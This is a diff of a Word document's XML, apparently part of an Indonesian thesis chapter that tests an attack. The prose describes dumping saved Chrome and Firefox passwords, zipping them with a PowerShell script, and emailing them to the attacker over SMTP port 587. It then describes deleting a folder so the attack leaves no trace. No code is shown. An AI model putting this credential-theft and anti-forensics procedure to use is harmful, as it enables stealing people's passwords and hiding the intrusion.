-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Setelah kedua </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.txt berhasil disalin kedalam folder Password maka langkah berikutnya adalah menjalankan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> zipping.ps1 seperti yang ditampilkan pada gambar V-1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7001488C" wp14:editId="14740990">
-            <wp:extent cx="4579315" cy="1729502"/>
-            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
-            <wp:docPr id="70" name="Picture 70"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -39705,7 +39443,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4620966" cy="1745233"/>
+                      <a:ext cx="4603466" cy="1738622"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -39721,15 +39459,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1440" w:firstLine="720"/>
+        <w:ind w:firstLine="431"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="162" w:name="_Toc43425339"/>
+      <w:bookmarkStart w:id="161" w:name="_Toc43425338"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39764,7 +39502,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>18</w:t>
+        <w:t>17</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -39779,69 +39517,129 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="162"/>
+        <w:t xml:space="preserve">. Berhasil Menyalin </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">File </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.txt</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="161"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-        <w:t>Pada Gambar V-1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>9</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> berikut ditampilkan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Setelah kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Password.zip berhasil dibuat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>yang berisi ChromePass.txt dan PasswordFox.txt.</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.txt berhasil disalin kedalam folder Password maka langkah berikutnya adalah menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> zipping.ps1 seperti yang ditampilkan pada gambar V-1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39852,6 +39650,12 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39864,10 +39668,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BEEFF90" wp14:editId="66D19250">
-            <wp:extent cx="4579315" cy="1620471"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="71" name="Picture 71"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7001488C" wp14:editId="14740990">
+            <wp:extent cx="4579315" cy="1729502"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="70" name="Picture 70"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -39887,7 +39691,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4607777" cy="1630543"/>
+                      <a:ext cx="4620966" cy="1745233"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -39904,15 +39708,14 @@
       <w:pPr>
         <w:pStyle w:val="Caption"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="center"/>
+        <w:ind w:left="1440" w:firstLine="720"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="163" w:name="_Toc43425340"/>
+      <w:bookmarkStart w:id="162" w:name="_Toc43425339"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39947,7 +39750,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>19</w:t>
+        <w:t>18</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -39962,147 +39765,95 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+        <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="162"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+        <w:t>Pada Gambar V-1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berikut ditampilkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>File</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="163"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:ind w:hanging="11"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="164" w:name="_Toc43426569"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pengujian Mengirim </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Email</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="164"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Password.zip berhasil dibuat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>yang berisi ChromePass.txt dan PasswordFox.txt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tahap pengiriman </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">email </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dilakukan dengan menjalankan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> maintenance.ps1 dengan menggunakan perintah seperti pada Gambar V-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>20</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> berikut ini.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DF6FDB" wp14:editId="4495C042">
-            <wp:extent cx="4578985" cy="1729377"/>
-            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
-            <wp:docPr id="72" name="Picture 72"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BEEFF90" wp14:editId="66D19250">
+            <wp:extent cx="4579315" cy="1620471"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="71" name="Picture 71"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -40122,7 +39873,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4592271" cy="1734395"/>
+                      <a:ext cx="4607777" cy="1630543"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -40138,7 +39889,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:left="720" w:hanging="11"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40146,7 +39898,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="165" w:name="_Toc43425341"/>
+      <w:bookmarkStart w:id="163" w:name="_Toc43425340"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40181,7 +39933,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>20</w:t>
+        <w:t>19</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -40196,9 +39948,58 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="165"/>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="163"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:ind w:hanging="11"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="164" w:name="_Toc43427736"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian Mengirim </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Email</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="164"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40211,23 +40012,11 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pada gambar diatas dapat dilihat </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tahap pengiriman </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -40235,19 +40024,13 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>berhasil dijalankan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> melalui celah port 587 SMPT sehingga dapat mengirimkan </w:t>
+        <w:t xml:space="preserve">email </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dilakukan dengan menjalankan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -40255,63 +40038,25 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">email </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>dari komputer target yang terhubung dengan internet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> yang berhasil dikirimkan akan diterima oleh penyerang seperti yang ditampilkan pada Gamb</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>r V-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> berikut.</w:t>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maintenance.ps1 dengan menggunakan perintah seperti pada Gambar V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berikut ini.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -40339,12 +40084,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4168FA20" wp14:editId="5B29C16F">
-            <wp:extent cx="4595495" cy="2483003"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="73" name="Picture 73"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DF6FDB" wp14:editId="4495C042">
+            <wp:extent cx="4578985" cy="1729377"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="72" name="Picture 72"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -40364,7 +40108,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4607235" cy="2489346"/>
+                      <a:ext cx="4592271" cy="1734395"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -40380,7 +40124,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="709"/>
+        <w:ind w:left="720" w:hanging="11"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40388,7 +40132,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="166" w:name="_Toc43425342"/>
+      <w:bookmarkStart w:id="165" w:name="_Toc43425341"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40423,7 +40167,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>21</w:t>
+        <w:t>20</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -40438,27 +40182,9 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Email</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="166"/>
+        <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="165"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40474,24 +40200,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:ind w:hanging="11"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="167" w:name="_Toc43426570"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Pengujian Menghapus Folder</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="167"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
@@ -40505,7 +40213,73 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Langkah terakhir dari rangkaian penyerangan yang dilakukan adalah dengan menghapus folder chrome dari direktori C: komputer target sehingga tidak meninggalkan jejak penyerangan yang mencurigakan. Pada Gambar IV-</w:t>
+        <w:t xml:space="preserve">Pada gambar diatas dapat dilihat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>berhasil dijalankan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> melalui celah port 587 SMPT sehingga dapat mengirimkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">email </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
